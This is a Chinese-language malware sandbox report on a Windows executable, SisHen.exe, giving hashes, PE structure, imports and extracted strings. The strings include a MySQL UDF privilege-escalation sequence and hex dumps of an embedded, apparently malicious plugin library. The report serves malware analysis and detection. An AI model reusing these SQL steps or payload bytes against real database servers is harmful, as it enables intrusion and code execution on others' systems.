恶意软件分析 & URL链接扫描免费在线病毒分析平台

分析任务

分析类型	虚拟机标签	开始时间	结束时间	持续时间
文件 (Windows)	win7-sp1-x64-hpdapp01-1	2019-11-18 23:49:39	2019-11-18 23:50:11	32 秒

魔盾分数

2.45

可疑的

文件详细信息

文件名	SisHen.exe
文件大小	146432 字节
文件类型	PE32 executable (console) Intel 80386, for MS Windows
MD5	a299016e2ffb864f6b079d2713d7fb59
SHA1	3fb39e890f73bb40f0dfb3ae131f392c9899884b
SHA256	2f4309a913764bfc8473c28f29a2eed1e8547dcf2f93ef40ff5ee604fedc1f94
SHA512	fd868ee9d85cdc176125552d41c6ee7bf3e382483a2a5f8100423d694819175219769357989c58bbe2728d82cf79840c6bdf8593f03e9a8263bdcf4e694de6c3
CRC32	E69BCE2A
Ssdeep	3072:64UC26M6PyIsIdyBvRTn/D30ljVtsZPYj:I/6VPyIsx/r0xVeP6
Yara	登录查看Yara规则
	样本下载提交漏报

登录查看威胁特征

运行截图

没有可用的屏幕截图

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

摘要

登录查看详细行为信息

PE 信息

初始地址	0x00400000
入口地址	0x0041a000
声明校验值	0x00033267
实际校验值	0x00033267
最低操作系统版本要求	5.0
编译时间	2016-01-19 20:39:06
载入哈希	0179c2116341bd1a2ecd951a447e7307

PE 数据组成

名称	虚拟地址	虚拟大小	原始数据大小	特征	熵(Entropy)
.text	0x00001000	0x0000b83a	0x0000ba00	IMAGE_SCN_CNT_CODE\|IMAGE_SCN_MEM_EXECUTE\|IMAGE_SCN_MEM_READ	6.57
.rdata	0x0000d000	0x0000870a	0x00008800	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	4.75
.data	0x00016000	0x00002d2c	0x00001200	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ\|IMAGE_SCN_MEM_WRITE	2.01
.rsrc	0x00019000	0x000001b4	0x00000200	IMAGE_SCN_CNT_INITIALIZED_DATA\|IMAGE_SCN_MEM_READ	5.11
.rmnet	0x0001a000	0x0000f000	0x0000e200	IMAGE_SCN_CNT_CODE\|IMAGE_SCN_MEM_EXECUTE\|IMAGE_SCN_MEM_READ\|IMAGE_SCN_MEM_WRITE	7.97

导入

库: KERNEL32.dll:

• 0x40d000 GetTickCount

• 0x40d004 lstrlenA

• 0x40d008 Sleep

• 0x40d00c GetLocalTime

• 0x40d010 HeapSize

• 0x40d014 ReadFile

• 0x40d018 GetProcessHeap

• 0x40d01c SetEndOfFile

• 0x40d020 WriteConsoleW

• 0x40d024 GetConsoleOutputCP

• 0x40d028 WriteConsoleA

• 0x40d02c LCMapStringW

• 0x40d030 LCMapStringA

• 0x40d034 GetStringTypeW

• 0x40d038 MultiByteToWideChar

• 0x40d03c GetStringTypeA

• 0x40d040 GetLocaleInfoA

• 0x40d044 GetSystemTimeAsFileTime

• 0x40d048 GetLastError

• 0x40d04c HeapFree

• 0x40d050 HeapAlloc

• 0x40d054 GetCommandLineA

• 0x40d058 TerminateProcess

• 0x40d05c GetCurrentProcess

• 0x40d060 UnhandledExceptionFilter

• 0x40d064 SetUnhandledExceptionFilter

• 0x40d068 IsDebuggerPresent

• 0x40d06c GetModuleHandleW

• 0x40d070 GetProcAddress

• 0x40d074 TlsGetValue

• 0x40d078 TlsAlloc

• 0x40d07c TlsSetValue

• 0x40d080 TlsFree

• 0x40d084 InterlockedIncrement

• 0x40d088 SetLastError

• 0x40d08c GetCurrentThreadId

• 0x40d090 InterlockedDecrement

• 0x40d094 HeapCreate

• 0x40d098 VirtualFree

• 0x40d09c DeleteCriticalSection

• 0x40d0a0 LeaveCriticalSection

• 0x40d0a4 EnterCriticalSection

• 0x40d0a8 VirtualAlloc

• 0x40d0ac HeapReAlloc

• 0x40d0b0 CloseHandle

• 0x40d0b4 SetHandleCount

• 0x40d0b8 GetStdHandle

• 0x40d0bc GetFileType

• 0x40d0c0 GetStartupInfoA

• 0x40d0c4 SetFilePointer

• 0x40d0c8 RtlUnwind

• 0x40d0cc ExitProcess

• 0x40d0d0 WriteFile

• 0x40d0d4 GetModuleFileNameA

• 0x40d0d8 FreeEnvironmentStringsA

• 0x40d0dc GetEnvironmentStrings

• 0x40d0e0 FreeEnvironmentStringsW

• 0x40d0e4 WideCharToMultiByte

• 0x40d0e8 GetEnvironmentStringsW

• 0x40d0ec QueryPerformanceCounter

• 0x40d0f0 GetCurrentProcessId

• 0x40d0f4 GetCPInfo

• 0x40d0f8 GetACP

• 0x40d0fc GetOEMCP

• 0x40d100 IsValidCodePage

• 0x40d104 GetConsoleCP

• 0x40d108 GetConsoleMode

• 0x40d10c InitializeCriticalSectionAndSpinCount

• 0x40d110 SetStdHandle

• 0x40d114 FlushFileBuffers

• 0x40d118 CreateFileA

• 0x40d11c LoadLibraryA

库: WS2_32.dll:

• 0x40d14c WSAStartup

• 0x40d150 socket

• 0x40d154 ioctlsocket

• 0x40d158 gethostbyname

• 0x40d15c htons

• 0x40d160 connect

• 0x40d164 __WSAFDIsSet

• 0x40d168 select

• 0x40d16c closesocket

• 0x40d170 WSACleanup

• 0x40d174 inet_addr

库: LIBMYSQL.dll:

• 0x40d124 mysql_init

• 0x40d128 mysql_real_connect

• 0x40d12c mysql_query

• 0x40d130 mysql_use_result

• 0x40d134 mysql_fetch_row

• 0x40d138 mysql_free_result

• 0x40d13c mysql_get_server_info

• 0x40d140 mysql_num_fields

• 0x40d144 mysql_close

.text
`.rdata
@.data
.rsrc
@.rmnet
VWht7A
D$PhT7A
@h<7A
Ph@6A
T$(Rh46A
t$h 8A
FhhgA
Y;=XgA
uBh[m@
Fh=hgA
SVWUj
uL9=HyA
9=HyA
95\zA
@hHJA
INSERT INTO `sillyr5_x` VALUES (CONVERT(%s,CHAR));
8B4EBD06ED63C60D0EEB220DF580E50EF636247018460E83C0DA737B0BAF473E2F56190DC716741F4FB62F90C817D09E14093EC36C4BB8C0099871055D16DC06E9CE76680B5970DCA606ED909AAD3708B903F08977CF116E17960601DF07910C833DE2665BE6703564271880C5E218BCBA6A9A7A063370A49DE1AC8C3D891BCD0CF6FBEDDA268B24D9309C1B52D60682B36DBF3838FA750B17CB139219E93E7BEB7EB9085F0D08902D6EA80D32B22511549640CF13ED8D39B00D82174038647B707D3F0296A3382D90B27CAE40EA3A11407EC0F6307307700CFC1BC3250E3C98DDB7EE1B1914681DA8C003B0B145B82DA103651DDB228D8FED2BFFB50E3A03BE02B6D08C2F0BA7C33BDF72ED639093098B0D37B3ACF907120119488BC1B94D5A4ABC357E6639087403825363483C86FFDEF00E9081395045980CBA0B021D51180F94B1E1E2DBC0F33A4C63413C1E60D2A2C1F62F99C1410FB740144504587CBCC09BDEEF001845A41E8B510CAAD2720ADBD2DB4B9F0803C209D0720FAEC177C12160EDFD28453BCB72E26171811389D20BDB4CC1630D12E484E7B0EDDD97EB5CBB224D2BC10ED011167F8B6F8CCE0F3F24C1E81FF7D0198983698954022F3DB1C8C8D8B3F804EA057C666E4C1ECC682318A1AF13DCBF153EF0640705BF32A2DF2D992B0FDA35B407C84853B6981EEB76EAF0161EBA30CA133C33C8D6FA5C1AA803D849320BA48745C80C78E8108F62BBDA354C33384C84B8FF007F69B6ED1123D80C336EF23BDF4C0F44D8C3EBEE2E1D226D49F7D30920969E7C47BA4940D106B80305BAE88C8C8CBCBE406D3B1B596F0355DBEA02D1C2E163BBA94D0B018B0807247936EEB79625E45D2FF9AD123292CD262518B88D095BD93E6F010699BBD1C58138C1C019C18B012EE90154D900000490E55EC9FF0F433A5C53716C25642E6578652030BBA3ACC107D01521031010DEA0DB2CF20C220F0876086496DF967FC21319220700103497017E09C00770DB3697DB06501B141470041B0313016E4BB00C760230130101CC04DBBFDDBA4207064B063219011D0C001DC40B0374EC5F2E970A540934083219F017E015D023CDB2DB1E50191513151F156415159ACB66FB5211C0341CCD02771759181D6AB6E9CE07710F5F501DC3DBDD2ED1547C0F64A30F3407320B82F305FB6D0C350C011100117F4701B6C39A6D531A03B969370AC00A7B58B0EF330A32067009B32BE71B0B91B3D9661A901D072B086900550269E314A3AA008492FD83A6CD5D20D266D4FF00176030A28AF704601415FF7772F90507BA11F821DE0BAED9364DE8E00E1223E42007CDB269BA370B3C40A81328B08D015C7607131444221F31DD604DD30B3C90EE17F00B4966B96C96174C4C1781187065D334CB8418C1ACC40E1A4DD32C9BBC1C1ACCC4CCE3DF6CD3343CE41C1B8F0754EEB9CD600BE0211C679B07756300BBF30310234F430368483348D717500B69698200A3483390B1014416A3A8EF0A400205405516AA0CF9FFF21CA01001436C6F736548616E646C65DBD9BF7F577269746546690A437265610B410C47B77FECFF65745469636B436F756E740D50726F63416464237373DB67FF6F0F4C6F61644C6962726172792B437572196EEE81ED6224204964145468586BDFB6BF6413517565305003666F726D7F29DABFB5585D0E1852746C436170742FF65B6CE71211787412656F6B75704623E591DBF663746916452A7279566972DDF6EFFE616C556E77696E55497344656275676748509D65EDB1AD7CAF531D68E2644578685658CCBD7040D96C19A16D5BCAC81254176D65178FB53699115339352B5379733B2C2C6C176D266D30733609FE3FCDC267ADA05F5F435F737065636966DAC7CE16485F72721570705863775FA1FDC3745F616D73675FF3871C630B6D7B6B24295F7479375F76275F6E736E6B7A53730A2A0A6C21DA2B140A0DBE972A4FC98205DB096E37130F755B6BBB748A363408055C6510722BC4CACD7EBA6672643F3D39430B423399651467177BBB0F636F035F706F6B10656EEB5A7BB76481756C771658186D175EB30B580C866D61635285D965C93344737705D66C16BA7210661BB9501149D0B8ECB72D994FE76E55726C41115284B1ECE02B4C11AFFBB136B0383500F094112808567FC87F69451264860600E27E9856F00022200B699E34CB02090E14841810FB82981C80019305046ECD96EC00070370041EFC7C952D1B7628060FE736DBB30A102807791C23EA14B098FBBA04B0404082702F6E0364676000201E78016477BA422E3E90B10D8D4FD917FB0442602E7264D590A63BB761108908270A1269F86CB7B2402E2600D8052B30367BCADEDC27C02E7028E331800D3640271E4F726CB041B814630013509B2027260B8E0365572B24BB6F4ACE4F24421BE817D96200007023DF0624000000FF0048894C240848895424104C8944241880FA010F854502000053565755488D350DF3FFFF488DBE0090FFFF5731DB31C94883CDFFE85000000001DB7402F3C38B1E4883EEFC11DB8A16F3C3488D042F83F9058A1076214883FDFC771B83E9048B104883C00483E9048917488D7F0473EF83C1048A10741048FFC0881783E9018A10488D7F0175F0F3C3FC415BEB0848FFC6881748FFC78A1601DB750A8B1E4883EEFC11DB8A1672E68D410141FFD311C001DB750A8B1E4883EEFC11DB8A1673EB83E8037217C1E0080FB6D209D048FFC683F0FF0F843A0000004863E88D410141FFD311C941FFD311C9751889C183C00241FFD311C901DB75088B1E4883EEFC11DB73ED4881FD00F3FFFF11C1E83AFFFFFFEB835E4889F7B9000E0000B2004889FBEB2C8A074883C7013C80720A3C8F7706807FFE0F74062CE83C0177233817751F8B072500FFFFFF0FC829F801D8AB4883E9048A074883C70148FFC975D9EB0548FFC975BE4883EC28488DBE006000008B0709C0744F8B5F04488D8C30B48200004801F34883C708FF960483000048958A0748FFC708C074D74889F94889FAFFC8F2AE4889E9FF960C8300004809C074094889034883C308EBD64883C4285D5F5E5B31C0C34883C4284883C704488D5EFC31C08A0748FFC709C074233CEF77114801C3488B03480FC84801F0488903EBE0240FC1E010668B074883C702EBE1488BAE14830000488DBE00F0FFFFBB00100000504989E141B8040000004889DA4889F94883EC20FFD5488D871702000080207F8060287F4C8D4C24204D8B014889DA4889F9FFD54883C4285D5F5E5B488D4424806A004839C475F94883EC804C8B442418488B542410488B4C2408E94389FFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C90000058020000E404000000000000585000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D22616D64363422207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E000000000000000000000000549300000493000000000000000000000000000061930000349300000000000000000000000000006D930000449300000000000000000000000000000000000000000000789300000000000086930000000000009693000000000000A693000000000000B4930000000000000000000000000000C2930000000000000000000000000000C89300000000000000000000000000004B45524E454C33322E444C4C004D5356435239302E646C6C0057494E494E45542E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C4672656500000072616E640000496E7465726E65744F70656E410000000000E27E9856000000001E940000010000000300000003000000009400000C940000189400004012000020120000101200002A9400003394000043940000000001000200556466735F36342E646C6C00646F776E676F746100646F776E676F74615F6465696E697400646F776E676F74615F696E6974000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
32FC3F50D8C02D4743535BC9C86A10737FE36D431158D072F98BF28B5D081C54E165777BE433C95CFC897D2008FC3BF15AEFB61663393A4417E4F906BF3BF0B68577FF740583FE02752EA152E03BC1749E565FD09C59B8E13B5EE4000393110EF6E09E17A714168012B5F9ED867F054627FE0175246420575013109B159AA157772F52FB6BB4D7D2061153F76A0375434F873DDB0D34032168742E2C25466BE1617FEB1B71EC6DDB2E958FB7AAE05051648C1065E85BC3A115F62FFAD2FE6DFFEDF1DB761906D82AE421D9C396EC2B9C267516FF3B246A1BDE7DC1B10B12547D108B550C0D05CD595D503A88193822FE0373F366DA5F212043051C891518891DDB77737314893510893D0C668C1838060D344BB3342C1D0805047D774BB325002D7FFC9C8F1430CF9F6DAC9556240704288D4508349D8DB1F68B85E0FCA0AA709501DBE0D8AE1C1920241318091DC0097377CD181CB37F8985D8320A7D6398E504DC032434689ECEF86BD4DFA8596AF72879E41DD6BEC70A2C833D2000F92368A74F46E05B123034C9C380221F17BE3C1EAE5F6A144A80E9B1909215AAF8A29C8CC3EF3F106C59EB676A0837C0598FEDAD3B243727355934E0F5E63BDC0ABF03E4507F4B98185BDBBE5036BA1CDC142CD6E288B154B609E01B14F4CF26CB4BDB08B4DC6CB4596FFFB909D94E1E18F7D81BC00359485DBFF4ED761656B8BC48BE0457503BC6730F8BF4D28D8E0753025083C7B3FE72F129E439AC302550507D2316B0CC006E3A08B84D5AF2EF4ABF3366390174045D6D413C03C18138504589FF5EE275EFB0B90B011C48180F94C2B75B53CA5A1E3FE24831C8C476DBE00FB741E5560571063357351A4BAD0FBF1676E9A5B5FFFFBF1C0C3BF972098B580803D93BFB720A4283C0283BD672E86AF3E19535E45D8F6AFEA8A06861BE8163F16417075083EC08BE1B6E8D2E316B33C575F064A31A8960E133943551096854F05FD7DD78B1091AC404F455972D13505B34CB64196C083B62240A41B8F0C1E81FF714E0018E036ABBEDD44F220059948BE59614EBD84EA201CA3DAEC0FAB1B216ECA22FBB31232363273F8805584C5461E0316BD7CB3BDE5CB6D97611896C038D2BE0D6FCB0060ACECDFC8FFC66039BCC4058E9C3717070186772512F145ACBAFDBCDBF69032E0420F00BC618D98A1DAC5D2EEC106863F883E6E01F5357BF4EE640BB5F665D7F2A94B80D85C30C117504EB6056D6DA276D75F844448B7598920B06195B2261F0071C0C6BB733579D2720B4F4330C116FEF6E743BF7B6BE4F59EB0B85F30A8BC6C1FAD823F0E0100BF0A900F7D607045E5F5B8C8C8D509B1B80055C60C08E8C8C6468700000FFD729AA035CFA433A5C53716C25E00A2DF9642E6578654603771325231B482029114001C1023920F11AA36493EF8B07D00FA039AC1BACDC07A803BC27CC3BB01629620FD81F0502DD090A4B035FEA88C04A51F8D8774520D1B119BF44FF00A3AA48285A04000006FFA6A0022C0C78BFFC7F791001436C6F736548616E646C655772697465FFEDECDF46690A437265610B410C4765745469636B43B7DB3FF66F756E740D50726F634164642373730F4C6FB1EDB3FF61644C6962726172792B437572196E245FF7C07620496414546858641351ACB56FDB7565305003666F726D7F295DDDF6DF5A0E1849734465627567670B5060656F8FBD7C7253556E68A56445782B7074696C85C5DC6F6E9C2F198B32F7B6A51254176D696EDA11B7D60A6F497505DE40826D709A6BCE6DC56547517F775577CB12D651221B5C5379733B2C2C6C186D1A6D24732A09F83FCDC25B854C5F616D73675F6578DFFDF657540B646A752D5F666469760D5F437070585D6B87B563ACA95F9325096DDC6FED6B2E1D634B645F7479706518EEDCD616205FB058730A216E616C5B7BAF602A8E2AF8096E3059B06063130F65B6B5278C105F1E723456DF6D1C6DADEDBA1874A836340805A165206C3BD72972211663722C647B802D74B7356F6F4C660E659E626FADB90A2046035F706F8E6BDFEDFB656E1064A4756C9A6DA087D965C99E4B1B2C73693DCD42F773707210662B91A849D9C26D8BDB8B4FF26E556B411163D9C171522F5C11B3636D60093835001BFF37FFFFAF1D180D420E0C2F5449C007330610060E090705160C1E080A0B16FFF6B7FF0918181505061B050C180717062105110F061421110B082B4EBEFF6F2205070D111D0D18532D4838060007082EDBBF5D0C09330A090B0C05100516160E0BFFFEEDDF34150B18160D3D0542C105121E140669301D4D0517ED7FECE6230D0C24080B43F0FC041C044404400806FA77146C07002C4C010500237E98569396FFB06EE00002210B01090C957B04CC7E00E7160B7C09379B6CDF0B021E0507039DC52ECD6004B2E61E3410B3D5B3810706F025F079805C9E65BC215040B00254B21430502D015D4801DDF0974024BCB6BB30902F2EA6787407D00B90F4219B0D0CB742602E72644B18E4B69D61FB69060813DC62CD6102402E26275C0336254DD3300218C04F7D2FD88D736300EBB0731A364723804FE8B6FB886F4A067B504F1E421B00F091DBC82212DD527A5300000000000000000048FF000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B9300000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B472000001F35083C708FF9604730000958A074708C074DC89F95748F2AE55FF960873000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAE0C7300008DBE00F0FFFFBB0010000050546A045357FFD58D870F02000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9CE99FFFF0000004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030001040210010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000056020000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50410000000000000000000000002C83000004830000000000000000000000000000398300001C83000000000000000000000000000045830000248300000000000000000000000000000000000000000000508300005E8300006E8300007E8300008C830000000000009A83000000000000A0830000000000004B45524E454C33322E444C4C004D5356435239302E646C6C0057494E494E45542E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C4672656500000072616E640000496E7465726E65744F70656E410000000000237E985600000000F6830000010000000300000003000000D8830000E4830000F0830000E0110000C0110000B0110000028400000B8400001B840000000001000200556466735F33322E646C6C00646F776E676F746100646F776E676F74615F6465696E697400646F776E676F74615F696E69740000000000700000100000005D3B583D5C3D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
CREATE FUNCTION downgota RETURNS STRING SONAME '%s';
c:\\winnt
c:\\windows
SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\%s' FROM sillyr5_x
show variables like '%plugin%'
CREATE TABLE `sillyr5_x` (`sillyr_at_gmail_dot_com` longblob NOT NULL)
DROP FUNCTION downgota
CREATE OR REPLACE FUNCTION
DROP TABLE `sillyr5_x`
sillyr%d_x.so
linux
show variables like '%version_compile_os%'
Result.txt
mysql
SELECT downgota("%s")
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
(null)
`h````
UTF-8
UTF-16LE
UNICODE
CorExitProcess
runtime error 
Microsoft Visual C++ Runtime Library
<program name unknown>
Program: 
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CONOUT$
GetTickCount
lstrlenA
Sleep
GetLocalTime
KERNEL32.dll
WS2_32.dll
mysql_close
mysql_num_fields
mysql_get_server_info
mysql_free_result
mysql_fetch_row
mysql_use_result
mysql_query
mysql_real_connect
mysql_init
LIBMYSQL.dll
GetSystemTimeAsFileTime
GetLastError
HeapFree
HeapAlloc
GetCommandLineA
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
GetModuleHandleW
GetProcAddress
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
SetLastError
GetCurrentThreadId
InterlockedDecrement
HeapCreate
VirtualFree
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
VirtualAlloc
HeapReAlloc
CloseHandle
SetHandleCount
GetStdHandle
GetFileType
GetStartupInfoA
SetFilePointer
RtlUnwind
ExitProcess
WriteFile
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
QueryPerformanceCounter
GetCurrentProcessId
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
GetConsoleCP
GetConsoleMode
InitializeCriticalSectionAndSpinCount
SetStdHandle
FlushFileBuffers
CreateFileA
LoadLibraryA
GetLocaleInfoA
GetStringTypeA
MultiByteToWideChar
GetStringTypeW
LCMapStringA
LCMapStringW
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
SetEndOfFile
GetProcessHeap
ReadFile
HeapSize
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
KyUffThOkYwRRtgPP
Srv.exe
FreeLibrary
CreateMutexA
CloseHandle
ReleaseMutex
GetLastError
CreateFileA
WriteFile
GetModuleFileNameA
CreateProcessA
kernel32.dll
YvH}c{x
$xptJ
KERNEL32.DLL
(null)
mscoree.dll

没有防病毒引擎扫描信息!

下载PCAP包

访问主机纪录 (可点击查询WPING实时安全评级)

无主机纪录.

TCP

无TCP连接纪录.

UDP

无UDP连接纪录.

域名解析 (可点击查询WPING实时安全评级)

无域名信息.

TCP

无TCP连接纪录.

UDP

无UDP连接纪录.

HTTP 请求

未发现HTTP请求.

SMTP 流量

无SMTP流量.

IRC 流量

无IRC请求.

ICMP 流量

无ICMP流量.

CIF 报告

无 CIF 结果

网络警报

无警报

TLS

No TLS

Suricata HTTP

No Suricata HTTP

未发现网络提取文件

抱歉! 没有任何文件投放。

没有发现相似的分析.

HTML 总结报告 (需15-60分钟同步)	下载

Processing ( 23.339 seconds )

15.452 Suricata
3.282 VirusTotal
2.205 Strings
1.159 Static
0.434 peid
0.36 NetworkAnalysis
0.353 TargetInfo
0.086 AnalysisInfo
0.005 Memory
0.003 BehaviorAnalysis

Signatures ( 0.161 seconds )

0.021 md_url_bl
0.019 antiav_detectreg
0.016 md_domain_bl
0.011 anomaly_persistence_autorun
0.008 antiav_detectfile
0.008 ransomware_files
0.007 infostealer_ftp
0.007 ransomware_extensions
0.005 infostealer_bitcoin
0.005 infostealer_im
0.004 tinba_behavior
0.004 antianalysis_detectreg
0.003 rat_nanocore
0.003 cerber_behavior
0.003 antivm_vbox_files
0.003 disables_browser_warn
0.003 infostealer_mail
0.002 betabot_behavior
0.002 geodo_banking_trojan
0.002 browser_security
0.002 modify_proxy
0.002 md_bad_drop
0.001 network_tor
0.001 anomaly_persistence_bootexecute
0.001 ursnif_behavior
0.001 kibex_behavior
0.001 shifu_behavior
0.001 antianalysis_detectfile
0.001 antivm_parallels_keys
0.001 antivm_xen_keys
0.001 banker_zeus_mutex
0.001 bot_drive
0.001 bot_drive2
0.001 browser_addon
0.001 disables_system_restore
0.001 disables_windows_defender
0.001 maldun_malicious_drop_executable_file_to_temp_folder
0.001 office_security
0.001 rat_spynet
0.001 stealth_hiddenreg
0.001 stealth_hide_notifications
0.001 stealth_modify_uac_prompt
0.001 stealth_modify_security_center_warnings

Reporting ( 1.067 seconds )

0.813 ReportHTMLSummary
0.254 Malheur


Task ID	460755
Mongo ID	5dd2bdce2f8f2e08f860aa04
Cuckoo release	1.4-Maldun